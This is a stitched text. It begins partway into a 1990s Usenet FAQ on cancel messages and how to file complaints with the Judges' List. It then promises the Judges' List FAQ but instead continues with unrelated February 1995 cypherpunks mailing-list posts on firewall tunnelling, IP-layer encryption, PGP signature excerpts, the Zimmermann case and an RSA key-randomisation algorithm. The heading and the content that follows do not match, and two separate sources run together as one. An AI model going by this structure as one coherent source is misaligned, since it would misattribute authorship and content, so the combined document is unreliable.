4) When should I not issue a cancel message?

5) What should I do when in doubt about whether a 
cancel is appropriate?

6) What should I do if I receive a request to 
cancel one of my own messages?

7) How can I request that a message be cancelled 
when I can not do so myself?

8) What should I do if I suspect one of my 
posts has been improperly cancelled?

9) Why should I follow these guidelines?

*** Cancellation request form

*** Contributors to this FAQ

---------------------------------------------------------



***     Purpose of this document

This FAQ list serves as an introduction to cancel messages. 
More advanced information is presented in the document 
"Administration of Cancel Messages", which is directed to 
News system administrators. The objectives and operational 
procedures of Judges' List are specified and explained in the 
Judges-L FAQ, also available as the Welcome message for new 
subscribers to the List.


1)     What are cancel messages?

Cancel messages are special USENET messages from a class 
known as "Control" messages.  Control messages don't result 
in postings for people to read. Instead, they give 
instructions to the USENET server software at each site that 
gets the message.  A Cancel message is a control message that 
indicates that a particular message (named through its unique 
Message-ID) should be deleted.



2)     How have cancel messages been used?

Most commonly they are used when a person posts something 
they want to delete, correct, or retract.  One can cancel an 
old message and optionally issue a new one.  (There is a
better way to cancel and re-issue called Superseding, but 
most user programs do not support it.) 

Cancels are sometimes used by moderators of moderated 
newsgroups to delete messages that should not have been 
posted. 



3)     When should I issue a cancel message?

You should issue a cancel message if it becomes necessary to 
delete, correct, or retract one of your own posts.

You can issue a cancel message to delete a forgery: A message 
posted by someone else, that appears to be from you. A 
forgery can often be cancelled by you as if it were your own 
article. Such cancels should be reported to the Judges' List 
(see below).

Some victims of forgeries don't cancel them, but consider it 
sufficient to post disclaimers to the affected newsgroups 
alerting everyone to the forgery. This is wise, in any case, 
since the forged message is likely to be seen by many people, 
even if it is cancelled.

The newsreaders rn, nn, and trn use "C" as the cancel 
command. In Rusnews type ":cancel" while reading the message 
to be deleted.




4)     When should I not issue a cancel message?

It is not appropriate to cancel an article posted by someone 
else. However, a forgery is an exception. 

A low-tech form of "forgery" is to insert fabricated quotes 
in an article. Such posts should be followed-up with a 
correction and the poster notified. 

Misattribution of quotations, as opposed to fabrication, is 
often a result of inferior news-reading software. Such posts 
can be followed-up with a correction and the poster should be 
notified. 

It is inappropriate to cancel someone else's writing simply 
because you find the opinions expressed offensive. You can, 
however, ask the author to cancel the offensive post. Your 
news-reading software should permit you to enter the names of 
offensive posters in a "kill" file. Then, you will not see 
articles from that person in the future. Ask your 
administrator to upgrade your software if your news-reading 
software does not have this capability.

The poster should be asked to cancel a chain letter or a 
libelous article, or any other post, such as an advertisement 
or pyramid scheme, that has inappropriate content.  A copy of 
the request should be directed to the postmaster at the 
originating site, if the content is unlawful.



5)      What should I do when in doubt about whether a cancel 
is appropriate?

Unless you are certain the poster is acting in bad faith, you 
should explain to the poster why you object to the post and 
ask that it be deleted. State that you are considering 
submitting a complaint to the Judges' List and explain how 
one can participate in the dispute-resolution process (see 
below). You may explain how the offending post, or a post 
that accomplishes the same objective, can be broadcast.  One 
source of information is a list of Frequently Asked 
Questions, "How to find the right place to post (FAQ)" in the 
newsgroup "news.newusers.questions".

If the post comes from your site, contact your postmaster or 
News administrator for an opinion about whether the article 
violates the site's usage agreement.

Doubtful cases can be submitted to the Judges' List, for an 
opinion.

A complaint to the Judges' List must include a:

     :complete copy of the offending post.

     :complete copy of your letter to the poster, requesting 
that the post be cancelled.

     : complete copy of any reply from the poster or a News 
administrator (only if permission to forward is not refused).

The complaint must have a subject line that starts with the 
characters "COMPLAINT: ", followed by the subject of the 
offending post.

If you receive additional information after submitting a 
complaint or wish to withdraw the complaint, the same subject 
line should be used.

Mail the complaint to JUDGES-L@UBVM.cc.buffalo.edu or 
JUDGES-L@UBVM.BITNET.

If you wish to participate in the discussion of the 
complaint, email to LISTSERV@UBVM.cc.buffalo.edu or 
LISTSERV@UBVM.BITNET with only the command:
SUB JUDGES-L <your-name-here>
in the message body. Replace the <your-name-here>, with your 
first and last name, in the above command.

Before making comments on the List, please wait for someone 
to respond to your complaint. If there is no response within 
a week, it is most likely that you did not file a 
satisfactory complaint (see above). If you find no error in 
your complaint and the problem still has not been resolved, 
send an additional message asking for help.



6)     What should I do if I receive a request to cancel one 
of my own messages?

If you do not agree that the request is valid, reply to the 
request with your reasons for not cancelling. If the request 
does not mention the Judges' List, refer to this FAQ and ask 
that you be notified if a complaint is submitted.



7)     How can I request that a message be cancelled when I 
can not do so myself?

If your software does not permit cancellation, or you are not 
confident in using it, ask your administrator to issue a 
cancel message for you.



8)     What should I do if I suspect one of my posts has been 
improperly cancelled?

If you suspect that your post has been improperly cancelled, 
contact your News administrator to rule out the possibility 
of a technical failure. If there has been an improper cancel, 
complete documentation should be directed to the Judges' 
List. Follow the procedures for submitting a complaint, but 
replace the characters "COMPLAINT: " with "CANCEL: ".



9)     Why should I follow these guidelines?

If you do not cancel erroneous articles that you have posted, 
you waste readers' time and damage your own reputation as a 
reliable source. Consider an article posted to a typical 
newsgroup with 36,000 readers, a post that takes an average 
of 1 second for each reader to deal with (i. e., examining 
the subject line) uses a total of ten man-hours  (36,000 
seconds / 3,600 seconds/hour = 10 hours). If the article uses 
up an average of four seconds, then the total time 
expenditure is 40 hours, the equivalent of a work-week. This 
is probably the minimum time expenditure on any article that 
is even selected for scanning. Thus, a few minutes spent 
cancelling an article can save a lot of time for readers. 
Groups with a lot of erroneous articles tend to lose readers, 
and articles posted to those groups reach a limited audience. 
By cancelling erroneous posts, you also reduce the risk that 
your name will be entered in numerous kill files, thus 
limiting the audience you can reach with your posts. Posting 
of apologies for faulty articles, such as those with an empty 
body, is to be avoided, since this wastes even more time of 
the reader, without supplying useful information.

If you abuse the cancel facility, by cancelling other's 
articles, you force people to take defensive actions. Many 
administrators have disabled cancels, because they have been 
abused. The disabling of cancels means that you will not be 
able to delete all copies of your own posts. Therefore, if 
you cancel an erroneous article and then post a corrected 
one, readers at certain sites will first see the erroneous 
one and then the corrected one. They may think that the 
corrected one is a duplicate and not read it. This situation 
is obviously of no benefit to posters or readers. If your 
site's administrator has disabled cancels, it is wise for you 
to notify your administrator when you issue a cancel, so at 
least it can be deleted at your site. 

Disabling of cancels does not prevent a cancel from working 
at all, since the cancel message can delete the cancelled 
article before it gets to a site where cancels are disabled. 
Therefore, a cancel will be most effective if it is issued 
immediately after the target article is posted. In some 
cases, robot posters have been used to immediately repost 
articles that have been cancelled. This can rapidly lead to a 
newsgroup being overloaded at a site where the cancel 
facility has been disabled. This type of conflict situation 
should be avoided, since it makes the newsgroup unusable for 
most readers. Cancel messages must be used with extreme care.

If you cancel articles based upon their content, you expose 
your site to a legal risk, since it can then be argued that 
you are taking responsibility for all articles' content, some 
of which may violate copyright or pornography laws, for 
example. Originating sites already are exposed to this risk, 
therefore, they should be allowed to cancel such posts. They 
should also have a user agreement that permits them to 
discipline a user, thus ensuring that repeated postings of 
this type do not occur, and thereby reducing the legal risk 
at all News sites. 

This is not a hypothetical risk. Many sites have been closed 
down, had their equipment seized, and their operators 
prosecuted, and in some cases jailed. The effectiveness of a 
common-carrier or "bookstore" type of defense has yet to be 
established (But see Mike Godwin <mnemonic@eff.org>. INTERNET 
LIBEL: IS THE PROVIDER RESPONSIBLE? Internet World, Nov./Dec. 
1993) [URL: ftp://ftp.eff.org/pub/CAF/lawlibel_1.IW]. The use 
of non-originating site cancels, to control content of 
articles, reduces the chances that such a defense can ever be 
established. This could make the risk of operating a News 
site unacceptable. Some sites have already been prohibited 
from operating moderated newsgroups or mailing lists by their 
legal counsel, because of the legal risk associated with 
assuming responsibility for content of distributed messages. 
The damage to USENET caused by the most extreme case of 
abusive posting was much less than that caused by external 
threats, even when those threats did not directly result in 
disruption of a News site. Therefore, in doubtful cases, 
cancel messages should not be issued. Notification of 
authorities external to the Net should be avoided. Contacts 
to the Press should be left to those who have been trained in 
public relations or have equivalent experience.

In order to minimize legal liability, you should in, first 
instance, try to stop abusive posting at the source. By 
objecting directly to a poster of offensive material and 
making the person aware of this FAQ, you reduce the chances 
of repeated abuse.

In the case, that a poster refuses to comply with a request 
to cancel an article and you refer the matter to the Judges' 
List, the conflict can be resolved in a way which benefits 
the Net in the long term, and reduces the risk that you will 
be subject to retaliation, for example, by having your posts 
improperly cancelled. Complaints to the Judges' List also 
permits a database of repeat abusers to be built up, with 
much more effective resolution of such cases then becoming 
possible.



***     Cancellation request form

Sample reply to a poster requesting cancellation or 
explanation (not usable in cases where only the opinions 
expressed are offensive):

---------------------------------------------------------------
I object to your post, because ....

Please cancel this post and notify me that you have done so, 
or explain why you will not delete the post. Please note that 
any reply may be forwarded to the JUDGES-L list, unless 
explicit objection is given.

If I get no response, I will submit a complaint to the 
Judges' List. 

If you wish to participate in the discussion of the complaint 
on that List, email to LISTSERV@UBVM.cc.buffalo.edu or 
LISTSERV@UBVM.BITNET with only the command:
SUB JUDGES-L <your-name-here>
in the message body. Replace the <your-name-here>, with your 
first and last name, in the above command.
---------------------------------------------------------------



***     Contributors to this FAQ include:

Bob MacDowell <bobmacd@NETCOM.COM>
Tim Pierce <twpierce@midway.uchicago.edu>
David Stodolsky <david@arch.ping.dk>
Dimitri Vulis <dlv@dm.com>


================================================
Posted on behalf of the NetNews Judges(TM) List.
Judges-L Registrar,
dss


David S. Stodolsky, PhD  * Social *   Internet: david@arch.ping.dk
Tornskadestien 2, st. th.   * Research *    Tel.: + 45 38 33 03 30
DK-2400 Copenhagen NV, Denmark  * Methods *  Fax: + 45 38 33 88 80


And now, the "Judges List" FAQ:





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew J Ghio <mg5n+@andrew.cmu.edu>
Date: Sun, 5 Feb 95 15:10:45 PST
To: cypherpunks@toad.com
Subject: Re: The SKRONK protocols (version 0.6)
In-Reply-To: <m0rb7Za-0009tFC@sdwsys>
Message-ID: <YjBJeLe00bkR9JllAy@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


sdw@lig.net (Stephen D. Williams) wrote:

> UDP won't get through most firewalls.

I'm working on a program that gets around this.  It creates a IP tunnel
by setting up a SLIP interface on a encrypted TCP stream and routes
packets through that.  It's not completely finished but it does work. 
Send me mail if you want it.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: david.lloyd-jones@canrem.com (David Lloyd-Jones)
Date: Sun, 5 Feb 95 16:16:10 PST
To: cypherpunks@toad.com
Subject: RE: VINGE ON PKE ?
In-Reply-To: <m0rb1D8-0004IoC@s116.slcslip.indirect.com>
Message-ID: <60.19899.6525.0C1CE099@canrem.com>
MIME-Version: 1.0
Content-Type: text/plain


Ed Carp writes:


EC+There is a class of people called "idiot savants" who contain people who can
  +also solve such
  +problems by inspection - their IQs are often much lower than 100, so that
  +blows Albert's theory.  These so-called "idiot savants" can easily factor
  +100 digit numbers.  The ability to solve such problems is not tied to IQ,
  +as there are many such people with IQs of 150+ who cannot solve them.

 
Many idiot savants can multiply extremely large numbers, though I have 
not read of numbers with a hundred digits being involved.  Factoring 
large numbers is an extremely different kettle of fish, and I know of 
no writing about idiot savants doing difficult factoring.  If you have 
references to any such performances, I'd like to read them.
 
Szent Georgi's remark was addressed to general intelligenc in everyday 
life, not to bravura arithmetic.  My scepticism about all things IQish 
was supposed to be indicated by my use of quotation marks on "IQ".
 
                           Cheers,
 
                                -dlj.

david.lloyd-jones@canrem.com

 * 1st 1.11 #3818 * A piano is a piano is a piano. -- Gertrude Steinway.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Sun, 5 Feb 95 16:08:37 PST
To: Matthew J Ghio <mg5n+@andrew.cmu.edu>
Subject: Re: The SKRONK protocols (version 0.6)
In-Reply-To: <YjBJeLe00bkR9JllAy@andrew.cmu.edu>
Message-ID: <9502060008.AA03105@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Matthew J Ghio says:
> sdw@lig.net (Stephen D. Williams) wrote:
> 
> > UDP won't get through most firewalls.
> 
> I'm working on a program that gets around this.  It creates a IP tunnel
> by setting up a SLIP interface on a encrypted TCP stream and routes
> packets through that.  It's not completely finished but it does work. 
> Send me mail if you want it.

Pardon but... why? Whats the reason for wanting to do this?

If a firewall has been set up to stop UDP, then it should stop UDP. If
the firewall has not been set up to stop UDP, or has a mechanism like
the experimental versions of "socks" currently being played with that
relay UDP, then there is no reason to want to do the above. I don't
really understand what the idea is here.

Perry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew J Ghio <mg5n+@andrew.cmu.edu>
Date: Sun, 5 Feb 95 16:29:28 PST
To: cypherpunks@toad.com
Subject: Re: The SKRONK protocols (version 0.6)
In-Reply-To: <9502060008.AA03105@snark.imsi.com>
Message-ID: <sjBKpHm00bkP0bX0Yx@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


"Perry E. Metzger" <perry@imsi.com> writes:

> Pardon but... why? Whats the reason for wanting to do this?
> 
> If a firewall has been set up to stop UDP, then it should stop UDP. If
> the firewall has not been set up to stop UDP, or has a mechanism like
> the experimental versions of "socks" currently being played with that
> relay UDP, then there is no reason to want to do the above. I don't
> really understand what the idea is here.

Presumably you would only let trusted people tunnel through your firewall.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Sun, 5 Feb 95 16:48:44 PST
To: Matthew J Ghio <mg5n+@andrew.cmu.edu>
Subject: Re: The SKRONK protocols (version 0.6)
In-Reply-To: <sjBKpHm00bkP0bX0Yx@andrew.cmu.edu>
Message-ID: <9502060048.AA03181@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Matthew J Ghio says:
> "Perry E. Metzger" <perry@imsi.com> writes:
> 
> > Pardon but... why? Whats the reason for wanting to do this?
> > 
> > If a firewall has been set up to stop UDP, then it should stop UDP. If
> > the firewall has not been set up to stop UDP, or has a mechanism like
> > the experimental versions of "socks" currently being played with that
> > relay UDP, then there is no reason to want to do the above. I don't
> > really understand what the idea is here.
> 
> Presumably you would only let trusted people tunnel through your firewall.

Fine -- then packet filter on your firewall. Of course, you can't
really trust the IP addresses anyway -- you need something IPSP-like
if you actually want to trust outside hosts (swIPe does nicely as a
stopgap). And even if one wanted to move packets through a firewall
over TCP, why use SLIP encapsulation? It was designed for unreliable
links -- on a reliable link, you can save lots of grief by just
sending the packet -- total length of an IP datagram is included
inside the datagram, thus rendering further encapsulation unnecessary.


Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Sun, 5 Feb 95 16:45:30 PST
To: perry@imsi.com
Subject: Re: The SKRONK protocols (version 0.6)
In-Reply-To: <9502060008.AA03105@snark.imsi.com>
Message-ID: <199502060048.TAA19441@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain



>
>Matthew J Ghio says:
>> sdw@lig.net (Stephen D. Williams) wrote:
>> 
>> > UDP won't get through most firewalls.
>> 
>> I'm working on a program that gets around this.  It creates a IP tunnel
>> by setting up a SLIP interface on a encrypted TCP stream and routes
>> packets through that.  It's not completely finished but it does work. 
>> Send me mail if you want it.
>
>Pardon but... why? Whats the reason for wanting to do this?
>
>If a firewall has been set up to stop UDP, then it should stop UDP. If
>the firewall has not been set up to stop UDP, or has a mechanism like
>the experimental versions of "socks" currently being played with that
>relay UDP, then there is no reason to want to do the above. I don't
>really understand what the idea is here.
>
>Perry
>

Actually, tunneling through a telnet connection on an application-level
firewall does have its place, especially when the firewall's
granularity of authentication is designed only to bind authorized
people to telnet connections.   This way, the firewall need only
enforce a very simple access control model (which is easier to
verify is working correctly) and need make very few authentication
decisions on a per-packet basis.

The down side (which is why I don't do this myself) is that you
have to be careful that the external end of the tunnel does not
forward IP packets from the rest of the net and is otherwise
reasonably secure, or one such connection is enough to eliminate
any security benefits the firewall might otherwise have offered.
It's not clear there's much a telnet firewall can do to prevent
tunnels, however, so we might as well at least make them secure as
we can.

-matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sun, 5 Feb 95 20:23:55 PST
To: cypherpunks@toad.com
Subject: Excerpts of signed messages
Message-ID: <199502060423.UAA18043@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


(I forget if this was posted here last year, it sounds familiar.)

Suppose I get a PGP-signed flaming message, full of insults, and at the
end it says, sarcastically, "For a stupid moron, you've made some very
nice postings."  I could choose to excerpt this last part, "...you've made
some very nice postings", and exhibit it in signed form.  What I would do
is to run the MD5 hash calculation on the first part of the message, saving
the internal state of that calculation.  I then publish just that MD5 state
along with the rest of the message.  Someone can check the signature by
initializing their MD5 to that state, then running the algorithm on the
part of the message I publish.  This will end up with the signed MD5
value from the signature.

The checker would know he was dealing with an excerpt, and that it came
from the end of the message, but he would have know way of knowing what
was in the part that was removed.

Presently of course PGP has no mechanism to check such signature
excerpts, but that could be added.  Under some circumstances this might
be a desirable feature.  But people would have to be aware of the
limitation that the excerptable portion would have to be the tail end of
the message.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Sun, 5 Feb 95 20:32:42 PST
To: cypherpunks@toad.com
Subject: Re: "encrypt tcp connections" hacks
In-Reply-To: <9502060202.AA03281@snark.imsi.com>
Message-ID: <199502060431.UAA18798@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


Perry advocates IPSP as an almost-panacea for Internet security.  I
disagree.  I'll quote only the most relevant bits:

   From: "Perry E. Metzger" <perry@imsi.com>

   > I don't just want one or two encrypted applications -- like
   > the Kerberos telnet and rcp -- but something to transparently provide
   > privacy for all TCP sockets -- like SMTP sockets between (re)mailers,
   > NNTP, X11, FTP, MUDs, etc.

   Well, in the long term, my hope is that people use IPSP for this. It
   will mean that the kernels on their machines simply deal with all this
   stuff and that userland applications get to ignore it 90% of the time.

   [...]

   However, I'd say that this isn't going to be a permanently deployed
   thing on the net -- that much we can be pretty sure of.

The basic problem with assuming IPSP as a universal encryption
solution is that it answers an incomplete threat model.  IPSP works
where you trust the endpoints but not the intermediates.  When you
don't trust the endpoints for silence, but do trust them for routing,
IPSP doesn't work.  Let me make this concrete:

TIA on netcom.

Suppose I'm running extruded netcom ports on winsock clients using TIA
to multiplex the serial line.  (Some of you may be doing this right
now.)  My Netscape connection is passing from my MS Windows machine
through netcom over the internet to my web server of the moment.  IPSP
doesn't provide end-to-end security in this case, because the endpoint
for the IP packet (netcom) doesn't coincide with the endpoint of the
actual connection (the home machine).  A maxim:

Trust boundaries are not the same as machine boundaries.

It's fallacious to argue simply that everyone's going to be _on_ the
Internet soon enough anyway, and that this problem will go away.
Absolutely not.  If anything, this kind of proxying for Internet
connectivity is going to be come _more_ common, and that as a result
of cypherpunk projects for realtime proxy services, such as web and
ftp proxies.

You don't want to trust the proxy in an anonymization service to do
your crypto for you, just like (if you're smart) you won't trust your
secrets to netcom even for processes, much less for filesystems.  And
you can't say that all proxies are going to be IP-to-IP proxies,
either.  Some of them are going to be proxying the whole protocol,
some will participate partially, some not at all.  What this does
indicate, however, is that the need for peer-to-peer encryption will
be necessary at _each_ level of abstraction, and pretty much forever.

It will be an interesting and practical exercise in trust modeling to
figure out how to pass one layers policy requirement for a secure
channel to a service offering at a lower layer.  The problems involved
here are going to be extremely difficult to make work for anything
approaching generality.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lrh@PrimeNet.Com (Dr. Lyman Hazelton)
Date: Sun, 5 Feb 95 19:34:50 PST
To: strick at The Yak <strick@yak.net>
Subject: Re: "encrypt tcp connections" hacks
Message-ID: <199502060334.UAA09244@news.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


I realize this may be heresy, but have you considered a hardware solution?
Cisco is currently offering a version of their popular routers with a builtin
Zylink crypto box... uses either DES or a "proprietary single bit CFB mode"
system (maybe RC4?) which is exportable.  The boxes are relatively
inexpensive.  Zylink offers just the crypto box for even less.  Both boxes
offer DH key management.

                                                                        Lyman

To obtain my PGP key, finger lrh@primenet.com or see
my Web page at http://www.primenet.com/~lrh/index.html





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Sun, 5 Feb 95 18:03:00 PST
To: strick at The Yak <strick@yak.net>
Subject: Re: "encrypt tcp connections" hacks
In-Reply-To: <199502060105.RAA07673@nando.yak.net>
Message-ID: <9502060202.AA03281@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



strick at The Yak says:
> I take your opinions more seriously than perhaps I should,

I don't want to scare people into not doing things -- but I do want to
inform. Persons taking my opinion, or that of any authority, on face
value without doing their own reasoning, get what they deserve.

> I'm not doing this to re-invent the wheel.  I'm doing it because
> I need it, and nothing else is working very well for me.

Then do it...

> I'm doing it because I don't see anything that's easy-to-use in wide
> use today.  I don't just want one or two encrypted applications -- like
> the Kerberos telnet and rcp -- but something to transparently provide
> privacy for all TCP sockets -- like SMTP sockets between (re)mailers,
> NNTP, X11, FTP, MUDs, etc.

Well, in the long term, my hope is that people use IPSP for this. It
will mean that the kernels on their machines simply deal with all this
stuff and that userland applications get to ignore it 90% of the time.

> Let me name the ones I can think of.
> 
>   1.  	Matt Blaze just announced one.

>   2.	Kerberos4.  I use Kerberos4 between home and work all the time.
> 	However the only command I have that actually encrypts the
> 	session is the "rlogin" replacement.

And the telnet; however, it has a library to let you do whatever you want.

>       (But I sure use it, even if it's just DES.)

In v5 there is more general support, I believe.

> 	Also Kerberos administration is a nightmare.

Thats really an interface issue, I think -- they have a lot of the
fundamental stuff down. If thats one's only complaint with Kerberos (I
have others) the "right thing" is to build a simplified administration
system. 

> 	And the reason big providers like The Well and Netcom won't
> 	run kerberos (or at least not the last time I asked) is that
> 	they would have to hire another person just to do the
> 	password management etc.

Thats quite untrue -- passwords in kerberos are set by the users, not
by the administrators!


>   3.	Kerberos5.  I've been unable to build Kerberos5 on my 
> 	sun3.  Honestly.  To build it, I have to have ISODE, which seems 
> 	to be some enormous ISO thing that I haven't been able to build.
> 
> 	Again, not too encouraging for your average unix sys admin.

You only need ISODE for the ASN.1 compiler; you don't have to build
the whole thing.

>   5.	Standards for IPng.  Vapor, as far as I know.  Is there any
> 	usable code, that works in IP this generation?

There is swIPe, and the derived TIS product. Its a bit primitive since
it doesn't handle per-socket keying. There is stuff that I'm hacking
on between flames -- its going to be called swIPe II. It will conform
to my RFC drafts and should run out of the box on any 4.4BSD
system. I'm hoping people will back-port it to SunOS and the like.

There is also SSL, which is what the Netscape people are pushing --
stands for Secure Sockets Layer.

There is also the thing this guy Andy Heffernan did a draft on in
which you do this at the TCP layer; he uses a TCP option to pass IVs
and MACs.

There is also the method proposed by the AFT working group at the
IETF, a.k.a. the "socks" working group, for encrypting sockets.

There is also the thing that Miron Cuperman wrote for YTalk. It did
diffie-hellman key exchange followed by an encrypted session.

There are about three or four more that I can't bring to mind at the
moment but I'm damn sure I've seen them.

> I think it comes down to the fact that, of these, only Skronk and 
> Blaze's software use a Diffee-Hellman -like Key Exchange so that
> administration stuff doesn't have to be done by humans and footnet.

Diffie-Hellman doesn't give you real security without some sort of way
to authenticate the exchange. Man in the middle gets you. You are then
down to either using signed exchanges or some sort of challenge or
conventionally keyed way of authenticating.

BTW, Kerberos most emphatically does not require active
administration. I've run it in an environment with thousands of hosts
with narry a person paying it any attention.

> The real value I'm adding is not the crypto.  It's the packaging.
> When I'm done it should be possible to skronk all your current 
> clients and servers by just overriding the shared library libc.so,
> running a skronk map UDP daemon, and customizing a configuration
> file to tell the daemon what to say.

Well, this is an admirable goal. Of course, the Netscape people want
to do the same thing with SSL, and others have proposed to do it, too.

Ultimately, the thing that is going to fix the net is IP layer
encryption -- anything at a higher layer can't really fix all the
problems reliably. (As an example, consider RST attacks against TCP
connections.) It also can't fix them pleasantly.

Meanwhile, of course, it is going to be a while before that stuff is
universally deployed. My reference implementation isn't going to be
here before April. It will be freely available, but it will only run
on some architectures, and it is unlikely to be idiot friendly or
perfect out of the box day one.

Understand, also, that as one of the few people here who writes code I
don't want to discourage you from continuing by any means!

However, I'd say that this isn't going to be a permanently deployed
thing on the net -- that much we can be pretty sure of.

> The discussion question is -- if we have so many hacks already -- 
> howcome they're not in use.

Probably people aren't that enthusiastic about them. Encrypted
sessions are in wide use for telnet and the like -- I do that sort of
thing regularly, and now that session stealing has become a fact of
the net I suspect that S/Key is going to vanish and be replaced by
various encrypted telnets. SMTP it doesn't make much sense to protect
because what you really want to protect is the contents -- i.e. via
PEM, MIME security multiparts, or some similar method (I favor PGP'ed
secure multiparts myself.)

> p.s.	need some wizard-level help here.
> 
> 	I use syscall(2) when I reimplement read() write() connect()
> 	accept() etc. on SunOS. 

Why? Why not just do the original calls? If you are trying to overlay
shared libraries, just rename the calls in the symbol tables or
relink the library or something similar...

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Sun, 5 Feb 95 21:06:23 PST
To: cypherpunks@toad.com
Subject: Zimmermann charges NOT dropped
In-Reply-To: <199502052059.MAA08492@netcom8.netcom.com>
Message-ID: <199502060504.VAA19605@netcom14.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



Charges against Phil Zimmermann have apparently NOT been dropped, and
Zimmermann's legal team is still in high gear.

Proving once more that things said or asked on this list often--even
usually--find their way to the persons mentioned, Phil called me today
to ask further about what I'd heard from Drew Taubman and to explain
that as of Friday, when Phil Dubois, Phil's lawyer, spoke to the
prosecutor in the case, the case had not been dropped. Or if it was,
the lead attorney and his client were not told.

(My discussion with Drew was at 10 p.m., Wednesday, Monte Carlo time.)

So, it appears that my source was either incorrect, or wires got
crossed in some way. (Or that EFF has access of a kind that seems
farfetched.)

Phil speculated that Drew was speaking about the LaMacchia case, of
several weeks back. This is unlikely, as the LaM. case was a separate
discussion we had, specific mention was made that the news was very
recent, happening within a few days of our conversation, and that
Senator Leahy would be incorporating changes based on the PRZ case
situation into legislation on telephony and expert being planned.

In any case, it seemingly is just not the case that charges have been
dropped (or that plans to file them have been dropped).

Anyway, my apologies. I sometimes think I am talking to the 20-30 of
you who post regularly, and can thus feel free to ask about a report
I've heard. But, as Hal Finney and others have also discovered, this
is not the case...boundaries are changing in cyberspace.

--Tim May


-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sun, 5 Feb 95 21:35:07 PST
To: cypherpunks@toad.com
Subject: Re: Remailer encryption module
Message-ID: <199502060534.VAA26941@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: eric@remailer.net (Eric Hughes)
> -- The RSA-encrypted session key does not have a flat representation
> over its multiword container.  This yields a statistical traffic
> analysis hole.  (This point is irrelevant without fixing 4.)  Hal and
> I completely solved this problem last year.

For reference, here is that old message with an algorithm that produces an
encrypted session key with a flat distribution over a specified number of
bytes, along with a proof that it works.  The purpose of this is you
could strip off the PGP header stuff and have a file which looked for all
intents and purposes like totally random bytes, but if you knew the
secret key then you could decrypt it just fine.

(I recently took my CP archives and indexed them using Mark Zimmermann's
(no relation to Phil, apparently) FreeText browser which lets me do
keyword searches.  Pretty nice.)

> Date: Mon, 7 Mar 94 08:34:04 -0800
> From: hughes@ah.com (Eric Hughes)
> Message-Id: <9403071634.AA10351@ah.com>
> To: cypherpunks@toad.com
> In-Reply-To: Hal's message of Sun, 6 Mar 1994 11:22:17 -0800 <199403061922.LAA26901@jobe.shell.portal.com>
> Subject: Truly Stealthy PGP (algorithm)
> Sender: owner-cypherpunks@toad.com
> Precedence: bulk
> Status: RO
> 
> >If I understand Eric's general idea, we would keep trying session keys
> >under a set of rules which would lead to the desired statistical
> >distribution of the encrypted key.  
>  
> I actually said nothing about how to get the particular distribution
> of keys specified, since that was another issue.  I was more concerned
> with just getting the one result across.
>  
> >Here is an algorithm which would work.
>  
> It does work, and I'll put down a proof sketch below.
>  
> Notation alert:
> >Let L be the next power of 256 above the modulus n.  Let t be the integer
> >part of L/n, so that L = n*t + s with s in [0,n).  Call the PGP IDEA session
> >key SK, and the encrypted version of that m = SK^e.  Now do these steps:
> 
> >1) Pick a random SK in [0,n).
> 
> This random number in [0,n) is the wrong distribution, but that's OK,
> since we'll be throwing some numbers away.
>  
> >2) RSA-encrypt it to form m = SK^e mod n.
>  
> RSA encryption is a bijection (an 1-1 map).  If it were not, there
> would be two or more possible decryptions for a given ciphertext.
> Therefore RSA encryption is a permutation, and a permutation of
> probabilities preserves expected values of functions of the
> probability, such as entropy.  Since we assume the entropy of the SK
> is maximal (probabilistic entropy), therefore the entropy of the m's
> is maximal.  So the m's have a flat distribution.
>  
> (As always, the above statements about bijection hold only if SK is
> multiple of one of the divisors of the modulus.  But then if you do
> find one of those, you've also factored the modulus and thus broken
> the key.  We assume this doesn't happen, since if it does little of
> this matters anyway.)
> 
> >3) Choose a random k in [0,t].
> >4) Calculate the "stegged" encrypted key as M = m + k*n.  
>  
> Hal now observes that M is uniformly distributed.  This is correct,
> and happens because m is in [0,n) and we are adding a multiple of n to
> m.  This means that each M has a unique represenative as some pair
> <m,k>.  Since both m and k are independently random (max entropy, flat
> distribution), so is M.
> 
> >5) if M is not in [0,L) (i.e. if M >= L) then go back to step 1.
> >The idea is that once we get M uniform in [0,(t+1)*n) we can make it
> >uniform in [0,L) simply by rejecting those candidates which were too high.
>  
